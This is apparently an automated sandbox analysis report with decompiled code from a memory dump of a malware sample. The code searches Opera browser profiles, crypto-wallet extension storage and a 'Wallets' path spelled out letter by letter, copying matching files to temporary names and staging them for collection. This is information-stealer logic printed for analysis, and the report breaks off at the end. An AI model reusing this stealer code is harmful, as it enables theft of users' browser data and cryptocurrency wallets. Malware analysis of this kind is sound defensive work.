                                        						} else {
                                        							_t132 = _t99 - 1;
                                        							if(_t132 == 0) {
                                        								lstrcatA( &_v276, "\\");
                                        								_t101 =  *0x29dd7ee8; // 0x15a3018
                                        								L13:
                                        								lstrcatA( &_v276, _t101);
                                        								L14:
                                        								lstrcatA( &_v276, "\\");
                                        								lstrcatA( &_v276,  &(_v1388.cFileName));
                                        								E29DB5640( &_v540, 0, 0x104);
                                        								_t107 =  *0x29dd8098; // 0x15a1f98
                                        								lstrcatA( &_v540, _t107);
                                        								_t183 = E29DADFE0( &_v540, _t179, _t182, 0x1a);
                                        								 *_t183 = 0;
                                        								E29DAFCE4(GetTickCount());
                                        								_t192 = _t189 + 0x14;
                                        								_t180 = 0x1a;
                                        								do {
                                        									_t112 = E29DAFCF6(_t199);
                                        									asm("cdq");
                                        									_push(_t112 % 0xa);
                                        									_push(_t183);
                                        									wsprintfA(_t183, "%s%d");
                                        									_t192 = _t192 + 0x10;
                                        									_t180 = _t180 - 1;
                                        								} while (_t180 != 0);
                                        								_t183[0x1a] = 0;
                                        								lstrcatA( &_v540, _t183);
                                        								CopyFileA( &_v804,  &_v540, 1);
                                        								_t184 = CreateFileA( &_v540, 0x80000000, 3, 0, 3, 0x80, 0);
                                        								if(_t184 != 0xffffffff) {
                                        									_t120 =  *0x29dd836c(_t184,  &_v1420);
                                        									_push(_t184);
                                        									__eflags = _t120;
                                        									if(_t120 != 0) {
                                        										CloseHandle();
                                        										_t122 = _v1420;
                                        										_t155 = _v1416;
                                        									} else {
                                        										CloseHandle();
                                        										_t122 = 0;
                                        										_t155 = 0;
                                        									}
                                        								} else {
                                        									_t122 = 0;
                                        									_t155 = 0;
                                        								}
                                        								_t123 = E29DB75A0(_t122, _t155, 0x3e8, 0);
                                        								_t156 =  *0x29dd826c; // 0x15a2688
                                        								 *0x29dd82f4 =  *0x29dd82f4 + _t123;
                                        								_push(_t156);
                                        								_push(_t137);
                                        								if( *0x29dd8550() == 0) {
                                        									 *0x29dd82e0 =  *0x29dd82e0 + 1;
                                        								}
                                        								_t173 =  *0x29dd827c; // 0x15a2a98
                                        								_push(_t173);
                                        								_push(_t137);
                                        								if( *0x29dd8550() == 0) {
                                        									 *0x29dd82e0 =  *0x29dd82e0 + 1;
                                        								}
                                        								_t127 =  *((intOrPtr*)(_v1392 + 0x20));
                                        								if(_t127 != 0) {
                                        									__eflags =  *_t127 - 2;
                                        									if( *_t127 == 2) {
                                        										 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t127 + 4)),  &_v540,  &_v276, 0, 2);
                                        									} else {
                                        										 *0x29dd8814 = 0x80000;
                                        									}
                                        								} else {
                                        									 *0x29dd8814 = 0x10000;
                                        								}
                                        								DeleteFileA( &_v540);
                                        								_t182 = _v1400;
                                        								_t179 = _v1392;
                                        								goto L31;
                                        							}
                                        							_t199 = _t132 != 1;
                                        							if(_t132 != 1) {
                                        								goto L14;
                                        							}
                                        							lstrcatA( &_v276, "\\");
                                        							_t101 =  *0x29dd7b98; // 0x15a44f0
                                        						}
                                        						goto L13;
                                        						L31:
                                        					} while (FindNextFileA(_v1396,  &_v1388) != 0);
                                        					_t160 = _v1396;
                                        					_t73 = FindClose(_v1396);
                                        					goto L33;
                                        				}
                                        			}














































                                        APIs
                                        • wsprintfA.USER32 ref: 29D9E0A2
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9E0B9
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9E0DF
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9E0F9
                                        • _memset.LIBCMT ref: 29D9E115
                                        • _memset.LIBCMT ref: 29D9E12B
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E13B
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E14D
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E161
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E173
                                        • lstrcatA.KERNEL32(?,015A1C60), ref: 29D9E19D
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1AF
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E1BD
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1CF
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E1E3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1F5
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E209
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E227
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E240
                                        • lstrcatA.KERNEL32(?,01597178), ref: 29D9E26C
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E27E
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E292
                                        • _memset.LIBCMT ref: 29D9E2A6
                                        • lstrcatA.KERNEL32(?,015A1F98), ref: 29D9E2BB
                                        • _malloc.LIBCMT ref: 29D9E2C3
                                        • GetTickCount.KERNEL32 ref: 29D9E2D0
                                        • _rand.LIBCMT ref: 29D9E2E4
                                        • wsprintfA.USER32 ref: 29D9E2F9
                                        • lstrcatA.KERNEL32(?,00000000), ref: 29D9E311
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9E32B
                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 29D9E34A
                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 29D9E365
                                        • CloseHandle.KERNEL32(00000000), ref: 29D9E370
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 29D9E397
                                        • StrCmpCA.SHLWAPI(?,015A2688,?,?,000003E8,00000000), ref: 29D9E3AA
                                        • StrCmpCA.SHLWAPI(?,015A2A98), ref: 29D9E3C2
                                        • DeleteFileA.KERNEL32(?,?,00000000,00000002), ref: 29D9E423
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D9E443
                                        • FindClose.KERNEL32(?), ref: 29D9E458
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Find_memset$Closewsprintf$CopyCountCreateDeleteFirstHandleNextSizeTickUnothrow_t@std@@@__ehfuncinfo$??2@_malloc_rand
                                        • String ID: %s%d$%s\*
                                        • API String ID: 24648945-989840649
                                        • Opcode ID: 6f7e2aa30287b2ee7f2f462e166ce30c9df7f4e242242fff4c44b9878b7d4f0a
                                        • Instruction ID: e1023048dd050bd2555e669ac44965ebd8bd43d059e517fee4b90e15ca0239fc
                                        • Opcode Fuzzy Hash: 6f7e2aa30287b2ee7f2f462e166ce30c9df7f4e242242fff4c44b9878b7d4f0a
                                        • Instruction Fuzzy Hash: ACB18172940218ABD715EBA0DC84FEA7778BB58701F44868DF609D3140EB749A85EFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 87%
                                        			E29D9E470(void* __ecx, CHAR* __edx, void* __edi, void* __esi, CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v804;
                                        				char _v1068;
                                        				char _v1332;
                                        				char _v1596;
                                        				char _v1860;
                                        				char _v2124;
                                        				struct _WIN32_FIND_DATAA _v2444;
                                        				CHAR* _v2448;
                                        				void* _v2452;
                                        				CHAR* _v2456;
                                        				void* _v2460;
                                        				void* __ebx;
                                        				signed int _t114;
                                        				signed char _t169;
                                        				signed char _t173;
                                        				signed char _t176;
                                        				intOrPtr _t179;
                                        				intOrPtr _t185;
                                        				intOrPtr _t186;
                                        				intOrPtr _t187;
                                        				intOrPtr _t188;
                                        				intOrPtr _t189;
                                        				intOrPtr _t190;
                                        				intOrPtr _t234;
                                        				intOrPtr _t235;
                                        				intOrPtr _t236;
                                        				intOrPtr _t237;
                                        				intOrPtr _t238;
                                        				intOrPtr _t239;
                                        				void* _t249;
                                        				void* _t250;
                                        				signed int _t251;
                                        				void* _t252;
                                        				void* _t253;
                                        				void* _t259;
                                        
                                        				_t250 = __esi;
                                        				_t249 = __edi;
                                        				_t114 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t114 ^ _t251;
                                        				_t179 = _a12;
                                        				_v2448 = _a4;
                                        				_v2452 = __ecx;
                                        				_v2456 = __edx;
                                        				wsprintfA( &_v2124, "%s\\*.*", __esi);
                                        				_t253 = _t252 + 0xc;
                                        				if(_t179 != 0) {
                                        					E29DB5640( &_v276, 0, 0x104);
                                        					_t180 = _t179 - 1;
                                        					if(_t180 == 0) {
                                        						lstrcatA( &_v276, "Opera Stable");
                                        						goto L26;
                                        					} else {
                                        						_t180 = _t180 - 1;
                                        						if(_t180 == 0) {
                                        							lstrcatA( &_v276, "Opera GX Stable");
                                        							goto L26;
                                        						} else {
                                        							if(_t180 == 0) {
                                        								lstrcatA( &_v276, "Opera Crypto Stable");
                                        								L26:
                                        							}
                                        						}
                                        					}
                                        					_t185 =  *0x29dd8088; // 0x1597178
                                        					wsprintfA( &_v1860, "%s\\%s\\%s\\%s", _t250,  &_v276, _t185, _t249);
                                        					_t186 =  *0x29dd7a9c; // 0x15a1b20
                                        					wsprintfA( &_v804, "%s\\%s",  &_v1860, _t186);
                                        					_t187 =  *0x29dd7ee8; // 0x15a3018
                                        					wsprintfA( &_v1332, "%s\\%s\\%s\\%s", _t250,  &_v276, _t187, _t249);
                                        					_t188 =  *0x29dd7a9c; // 0x15a1b20
                                        					wsprintfA( &_v540, "%s\\%s",  &_v1332, _t188);
                                        					_t189 =  *0x29dd7b98; // 0x15a44f0
                                        					wsprintfA( &_v1068, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t250,  &_v276, _t189, _t249);
                                        					_t190 =  *0x29dd7a9c; // 0x15a1b20
                                        					_t227 =  &_v1068;
                                        					_t134 = wsprintfA( &_v1596, "%s\\%s",  &_v1068, _t190);
                                        					if(_a16 != 0) {
                                        						_t134 = GetFileAttributesA( &_v804);
                                        						if(_t134 != 0xffffffff && (_t134 & 0x00000010) == 0) {
                                        							_t180 = _v2452;
                                        							_t227 = _v2448;
                                        							_t134 = E29D9E060(_v2452,  &_v276, _v2448,  &_v1860, _v2456, _a8, 1);
                                        						}
                                        					}
                                        					if(_a20 != 0) {
                                        						_t227 =  &_v540;
                                        						_t134 = GetFileAttributesA( &_v540);
                                        						if(_t134 != 0xffffffff && (_t134 & 0x00000010) == 0) {
                                        							_t180 = _v2452;
                                        							_t227 = _v2448;
                                        							_t134 = E29D9E060(_v2452,  &_v276, _v2448,  &_v1332, _v2456, _a8, 2);
                                        						}
                                        					}
                                        					if(_a24 != 0) {
                                        						_t134 = GetFileAttributesA( &_v1596);
                                        						if(_t134 != 0xffffffff && (_t134 & 0x00000010) == 0) {
                                        							_t180 = _v2452;
                                        							_t227 = _v2448;
                                        							_t134 = E29D9E060(_v2452,  &_v276, _v2448,  &_v1068, _v2456, _a8, 3);
                                        						}
                                        					}
                                        					goto L39;
                                        				} else {
                                        					_t227 =  &_v2124;
                                        					_t180 = FindFirstFileA( &_v2124,  &_v2444);
                                        					_v2460 = _t180;
                                        					if(_t180 == 0xffffffff) {
                                        						L39:
                                        						return E29DADF46(_t134, _t180, _v8 ^ _t251, _t227, _t249, _t250);
                                        					} else {
                                        						do {
                                        							_push(".");
                                        							_push( &(_v2444.cFileName));
                                        							if( *0x29dd8550() != 0) {
                                        								_push("..");
                                        								_push( &(_v2444.cFileName));
                                        								if( *0x29dd8550() != 0) {
                                        									E29DB5640( &_v276, 0, 0x104);
                                        									lstrcatA( &_v276,  &(_v2444.cFileName));
                                        									_t234 =  *0x29dd8088; // 0x1597178
                                        									wsprintfA( &_v1596, "%s\\%s\\%s\\%s", _t250,  &_v276, _t234, _t249);
                                        									_t235 =  *0x29dd7a9c; // 0x15a1b20
                                        									wsprintfA( &_v1068, "%s\\%s",  &_v1596, _t235);
                                        									_t236 =  *0x29dd7ee8; // 0x15a3018
                                        									wsprintfA( &_v540, "%s\\%s\\%s\\%s", _t250,  &_v276, _t236, _t249);
                                        									_t237 =  *0x29dd7a9c; // 0x15a1b20
                                        									wsprintfA( &_v1332, "%s\\%s",  &_v540, _t237);
                                        									_t238 =  *0x29dd7b98; // 0x15a44f0
                                        									wsprintfA( &_v804, "%s\\%s\\%s\\chrome-extension_%s_0.indexeddb.leveldb", _t250,  &_v276, _t238, _t249);
                                        									_t239 =  *0x29dd7a9c; // 0x15a1b20
                                        									wsprintfA( &_v1860, "%s\\%s",  &_v804, _t239);
                                        									_t259 = _t253 + 0x84;
                                        									if(_a16 != 0) {
                                        										_t176 = GetFileAttributesA( &_v1068);
                                        										if(_t176 != 0xffffffff && (_t176 & 0x00000010) == 0) {
                                        											E29D9E060(_v2452,  &_v276, _v2448,  &_v1596, _v2456, _a8, 1);
                                        										}
                                        									}
                                        									if(_a20 != 0) {
                                        										_t173 = GetFileAttributesA( &_v1332);
                                        										if(_t173 != 0xffffffff && (_t173 & 0x00000010) == 0) {
                                        											E29D9E060(_v2452,  &_v276, _v2448,  &_v540, _v2456, _a8, 2);
                                        										}
                                        									}
                                        									if(_a24 != 0) {
                                        										_t169 = GetFileAttributesA( &_v1860);
                                        										if(_t169 != 0xffffffff && (_t169 & 0x00000010) == 0) {
                                        											E29D9E060(_v2452,  &_v276, _v2448,  &_v804, _v2456, _a8, 3);
                                        										}
                                        									}
                                        									E29DB5640( &_v1596, 0, 0x104);
                                        									E29DB5640( &_v1068, 0, 0x104);
                                        									E29DB5640( &_v540, 0, 0x104);
                                        									E29DB5640( &_v1332, 0, 0x104);
                                        									E29DB5640( &_v804, 0, 0x104);
                                        									E29DB5640( &_v1860, 0, 0x104);
                                        									_t180 = _v2460;
                                        									_t253 = _t259 + 0x48;
                                        								}
                                        							}
                                        						} while (FindNextFileA(_t180,  &_v2444) != 0);
                                        						return E29DADF46(FindClose(_t180), _t180, _v8 ^ _t251,  &_v2444, _t249, _t250);
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • wsprintfA.USER32 ref: 29D9E4A9
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9E4C8
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9E4EC
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9E506
                                        • _memset.LIBCMT ref: 29D9E522
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9E538
                                        • wsprintfA.USER32 ref: 29D9E55A
                                        • wsprintfA.USER32 ref: 29D9E57A
                                        • wsprintfA.USER32 ref: 29D9E59C
                                        • wsprintfA.USER32 ref: 29D9E5BF
                                        • wsprintfA.USER32 ref: 29D9E5E1
                                        • wsprintfA.USER32 ref: 29D9E601
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E617
                                          • Part of subcall function 29D9E060: wsprintfA.USER32 ref: 29D9E0A2
                                          • Part of subcall function 29D9E060: FindFirstFileA.KERNEL32(?,?), ref: 29D9E0B9
                                          • Part of subcall function 29D9E060: StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9E0DF
                                          • Part of subcall function 29D9E060: StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9E0F9
                                          • Part of subcall function 29D9E060: _memset.LIBCMT ref: 29D9E115
                                          • Part of subcall function 29D9E060: _memset.LIBCMT ref: 29D9E12B
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E13B
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E14D
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E161
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E173
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,015A1C60), ref: 29D9E19D
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1AF
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E1BD
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D9E1CF
                                          • Part of subcall function 29D9E060: lstrcatA.KERNEL32(?,?), ref: 29D9E1E3
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E65E
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E6A5
                                        • _memset.LIBCMT ref: 29D9E6ED
                                        • _memset.LIBCMT ref: 29D9E703
                                        • _memset.LIBCMT ref: 29D9E719
                                        • _memset.LIBCMT ref: 29D9E72F
                                        • _memset.LIBCMT ref: 29D9E745
                                        • _memset.LIBCMT ref: 29D9E75B
                                        • FindNextFileA.KERNEL32(00000000,?), ref: 29D9E771
                                        • FindClose.KERNEL32(00000000), ref: 29D9E780
                                        • _memset.LIBCMT ref: 29D9E7A5
                                        • lstrcatA.KERNEL32(?,Opera Stable), ref: 29D9E7DE
                                        • wsprintfA.USER32 ref: 29D9E800
                                        • wsprintfA.USER32 ref: 29D9E820
                                        • wsprintfA.USER32 ref: 29D9E842
                                        • wsprintfA.USER32 ref: 29D9E865
                                        • wsprintfA.USER32 ref: 29D9E887
                                        • wsprintfA.USER32 ref: 29D9E8A7
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E8BD
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E904
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D9E94B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: wsprintf$lstrcat$_memset$File$Attributes$Find$First$CloseNext
                                        • String ID: %s\%s$%s\%s\%s\%s$%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb$%s\*.*$Opera Crypto Stable$Opera GX Stable$Opera Stable
                                        • API String ID: 2553220182-2904796700
                                        • Opcode ID: b3ad1f996143855ef90d243e69e82440789153c274d3341b3a1748d0e17312a5
                                        • Instruction ID: b7c8658b04b0bf4a96ac9df264ef7c113589309b0ffcd6ce39fe8949c41ffb20
                                        • Opcode Fuzzy Hash: b3ad1f996143855ef90d243e69e82440789153c274d3341b3a1748d0e17312a5
                                        • Instruction Fuzzy Hash: 5AE1A5B2910218ABDB25EB64DD85FDA7378BF48700F40868DF619A3581D734AB89DF70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E29D96160(intOrPtr* __ebx, CHAR* __ecx, CHAR* __edi, void* __esi, void* _a4) {
                                        				signed int _v12;
                                        				char _v280;
                                        				char _v544;
                                        				char _v808;
                                        				char _v1072;
                                        				void* _v2072;
                                        				struct _WIN32_FIND_DATAA _v2392;
                                        				void* _v2396;
                                        				CHAR* _v2400;
                                        				void* _v2404;
                                        				signed int _t62;
                                        				int _t75;
                                        				signed char _t85;
                                        				intOrPtr* _t113;
                                        				CHAR* _t152;
                                        				void* _t153;
                                        				signed int _t154;
                                        				void* _t155;
                                        				void* _t157;
                                        				void* _t158;
                                        
                                        				_t153 = __esi;
                                        				_t152 = __edi;
                                        				_t113 = __ebx;
                                        				_t62 =  *0x29dd5664; // 0xd9555f04
                                        				_v12 = _t62 ^ _t154;
                                        				_v2396 = _a4;
                                        				_v2400 = __ecx;
                                        				E29DB5640( &_v544, 0, 0x104);
                                        				E29DB5640( &_v2072, 0, 0x3e8);
                                        				_t157 = _t155 + 0x18;
                                        				lstrcatA( &_v544,  &_v2072 & (0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v2072) < 0x00000000) - 0x00000001);
                                        				if(__esi == 0) {
                                        					_t139 =  &_v1072;
                                        					wsprintfA( &_v1072, "%s\\%s\\%s",  &_v544, _v2396, _v2400);
                                        					_t158 = _t157 + 0x14;
                                        				} else {
                                        					_t139 = _v2396;
                                        					wsprintfA( &_v1072, "%s\\%s\\*",  &_v544, _v2396);
                                        					_t158 = _t157 + 0x10;
                                        				}
                                        				_t75 = FindFirstFileA( &_v1072,  &_v2392);
                                        				_v2404 = _t75;
                                        				if(_t75 == 0xffffffff) {
                                        					L22:
                                        					return E29DADF46(_t75, _t113, _v12 ^ _t154, _t139, _t152, _t153);
                                        				} else {
                                        					do {
                                        						_push(".");
                                        						_push( &(_v2392.cFileName));
                                        						if( *0x29dd8550() != 0) {
                                        							_push("..");
                                        							_push( &(_v2392.cFileName));
                                        							if( *0x29dd8550() != 0) {
                                        								if(_t153 == 0) {
                                        									wsprintfA( &_v808, "%s\\%s\\%s",  &_v544, _v2396,  &(_v2392.cFileName));
                                        									_t158 = _t158 + 0x14;
                                        								} else {
                                        									wsprintfA( &_v808, "%s\\%s\\%s\\%s",  &_v544, _v2396,  &(_v2392.cFileName), _v2400);
                                        									_t158 = _t158 + 0x18;
                                        								}
                                        								_t85 = GetFileAttributesA( &_v808);
                                        								if(_t85 != 0xffffffff && (_t85 & 0x00000010) == 0) {
                                        									E29DB5640( &_v280, 0, 0x104);
                                        									_t158 = _t158 + 0xc;
                                        									lstrcatA( &_v280, "\\");
                                        									lstrcatA( &_v280, "W");
                                        									lstrcatA( &_v280, "a");
                                        									lstrcatA( &_v280, "l");
                                        									lstrcatA( &_v280, "l");
                                        									lstrcatA( &_v280, "e");
                                        									lstrcatA( &_v280, "t");
                                        									lstrcatA( &_v280, "s");
                                        									lstrcatA( &_v280, "\\");
                                        									lstrcatA( &_v280, _t152);
                                        									lstrcatA( &_v280, "\\");
                                        									if(_t153 == 0) {
                                        										lstrcatA( &_v280,  &(_v2392.cFileName));
                                        									} else {
                                        										lstrcatA( &_v280,  &(_v2392.cFileName));
                                        										lstrcatA( &_v280, "\\");
                                        										lstrcatA( &_v280, _v2400);
                                        									}
                                        									if(_t113 != 0) {
                                        										if( *_t113 == 2) {
                                        											 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t113 + 4)),  &_v808,  &_v280, 0, 2);
                                        										} else {
                                        											 *0x29dd8814 = 0x80000;
                                        										}
                                        									} else {
                                        										 *0x29dd8814 = 0x10000;
                                        									}
                                        								}
                                        							}
                                        						}
                                        						_t139 = _v2404;
                                        					} while (FindNextFileA(_v2404,  &_v2392) != 0);
                                        					_t75 = FindClose(_v2404);
                                        					goto L22;
                                        				}
                                        			}
























                                        APIs
                                        • _memset.LIBCMT ref: 29D96190
                                        • _memset.LIBCMT ref: 29D961A6
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D961BD
                                        • lstrcatA.KERNEL32(?,?), ref: 29D961DB
                                        • wsprintfA.USER32 ref: 29D961FF
                                        • wsprintfA.USER32 ref: 29D9622B
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D96242
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9626C
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D96286
                                        • wsprintfA.USER32 ref: 29D962C0
                                        • GetFileAttributesA.KERNEL32(?), ref: 29D962FC
                                        • _memset.LIBCMT ref: 29D96321
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D96335
                                        • lstrcatA.KERNEL32(?,29DCFD20), ref: 29D96347
                                        • lstrcatA.KERNEL32(?,29DCFD24), ref: 29D96359
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9636B
                                        • lstrcatA.KERNEL32(?,29DCFD28), ref: 29D9637D
                                        • lstrcatA.KERNEL32(?,29DCFD2C), ref: 29D9638F
                                        • lstrcatA.KERNEL32(?,29DCFD30), ref: 29D963A1
                                        • lstrcatA.KERNEL32(?,29DCFD34), ref: 29D963B3
                                        • lstrcatA.KERNEL32(?,29DCD7BC), ref: 29D963C5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memsetwsprintf$File$AttributesFindFirstFolderPath
                                        • String ID: %s\%s\%s$%s\%s\%s\%s$%s\%s\*
                                        • API String ID: 664695751-1660153875
                                        • Opcode ID: 76e2d552b5dfab43d21768153b004558ea1030a24f782a3075d117c68fdd8391
                                        • Instruction ID: 8bc4b8c4e258b722eef5dd904d644b2520cb13e6bf3e2c69315b377e51b85eb8
                                        • Opcode Fuzzy Hash: 76e2d552b5dfab43d21768153b004558ea1030a24f782a3075d117c68fdd8391
                                        • Instruction Fuzzy Hash: F18184B6841258ABD715EBA0DC85FDAB378BF58B01F4086DDF205A7044EB349A899F70
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 71%
                                        			E29D9CE80(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, CHAR* _a16) {
                                        				signed int _v8;
                                        				char _v276;
                                        				char _v540;
                                        				char _v804;
                                        				char _v1068;
                                        				char _v2068;
                                        				struct _WIN32_FIND_DATAA _v2388;
                                        				char* _v2392;
                                        				void* _v2396;
                                        				intOrPtr _v2400;
                                        				intOrPtr _v2404;
                                        				intOrPtr _v2408;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				signed int _t56;
                                        				int _t61;
                                        				int _t72;
                                        				CHAR* _t83;
                                        				signed int _t88;
                                        				intOrPtr* _t94;
                                        				CHAR* _t100;
                                        				intOrPtr _t132;
                                        				void* _t133;
                                        				intOrPtr _t134;
                                        				CHAR* _t135;
                                        				signed int _t136;
                                        				void* _t137;
                                        				void* _t138;
                                        				void* _t139;
                                        				void* _t143;
                                        
                                        				_t56 =  *0x29dd5664; // 0xd9555f04
                                        				_v8 = _t56 ^ _t136;
                                        				_t100 = _a16;
                                        				_t134 = _a8;
                                        				_t132 = _a4;
                                        				_v2400 = __ecx;
                                        				_v2404 = _t132;
                                        				_v2408 = _t134;
                                        				_v2392 = _a12;
                                        				wsprintfA( &_v1068, "%s\\*", _t134);
                                        				_t138 = _t137 + 0xc;
                                        				_t119 =  &_v2388;
                                        				_t61 = FindFirstFileA( &_v1068,  &_v2388);
                                        				_v2396 = _t61;
                                        				if(_t61 == 0xffffffff) {
                                        					L18:
                                        					return E29DADF46(_t61, _t100, _v8 ^ _t136, _t119, _t132, _t134);
                                        				} else {
                                        					goto L1;
                                        				}
                                        				do {
                                        					L1:
                                        					_push(".");
                                        					_push( &(_v2388.cFileName));
                                        					if( *0x29dd8550() == 0) {
                                        						goto L16;
                                        					}
                                        					_push("..");
                                        					_push( &(_v2388.cFileName));
                                        					if( *0x29dd8550() == 0) {
                                        						goto L16;
                                        					}
                                        					wsprintfA( &_v804, "%s\\%s", _t134,  &(_v2388.cFileName));
                                        					_t139 = _t138 + 0x10;
                                        					_push(0x29dcd617);
                                        					_push(_t132);
                                        					if( *0x29dd8550() != 0) {
                                        						wsprintfA( &_v540, "%s\\%s", _t132,  &(_v2388.cFileName));
                                        						_t138 = _t139 + 0x10;
                                        					} else {
                                        						wsprintfA( &_v540, "%s",  &(_v2388.cFileName));
                                        						_t138 = _t139 + 0xc;
                                        					}
                                        					_t72 = PathMatchSpecA( &(_v2388.cFileName), _v2392);
                                        					_t148 = _t72;
                                        					if(_t72 == 0) {
                                        						L15:
                                        						E29D9CE80(_v2400,  &_v540,  &_v804, _v2392, _t100);
                                        					} else {
                                        						E29DB5640( &_v2068, 0, 0x3e8);
                                        						lstrcatA( &_v2068, "\\Soft\\");
                                        						lstrcatA( &_v2068, _t100);
                                        						lstrcatA( &_v2068, "\\");
                                        						lstrcatA( &_v2068,  &_v540);
                                        						E29DB5640( &_v276, 0, 0x104);
                                        						_t83 =  *0x29dd8098; // 0x15a1f98
                                        						lstrcatA( &_v276, _t83);
                                        						_t135 = E29DADFE0( &_v276, _t132, _t134, 0x1a);
                                        						 *_t135 = 0;
                                        						E29DAFCE4(GetTickCount());
                                        						_t143 = _t138 + 0x20;
                                        						_t133 = 0x1a;
                                        						do {
                                        							_t88 = E29DAFCF6(_t148);
                                        							asm("cdq");
                                        							_push(_t88 % 0xa);
                                        							_push(_t135);
                                        							wsprintfA(_t135, "%s%d");
                                        							_t143 = _t143 + 0x10;
                                        							_t133 = _t133 - 1;
                                        						} while (_t133 != 0);
                                        						_t135[0x1a] = 0;
                                        						lstrcatA( &_v276, _t135);
                                        						CopyFileA( &_v804,  &_v276, 1);
                                        						_t94 =  *((intOrPtr*)(_v2400 + 0x20));
                                        						if(_t94 != 0) {
                                        							__eflags =  *_t94 - 2;
                                        							if( *_t94 == 2) {
                                        								 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t94 + 4)),  &_v276,  &_v2068, 0, 2);
                                        							} else {
                                        								 *0x29dd8814 = 0x80000;
                                        							}
                                        						} else {
                                        							 *0x29dd8814 = 0x10000;
                                        						}
                                        						DeleteFileA( &_v276);
                                        						_t134 = _v2408;
                                        						_t132 = _v2404;
                                        						goto L15;
                                        					}
                                        					L16:
                                        				} while (FindNextFileA(_v2396,  &_v2388) != 0);
                                        				_t119 = _v2396;
                                        				_t61 = FindClose(_v2396);
                                        				goto L18;
                                        			}



































                                        APIs
                                        Strings
                                        Memory Dump Source
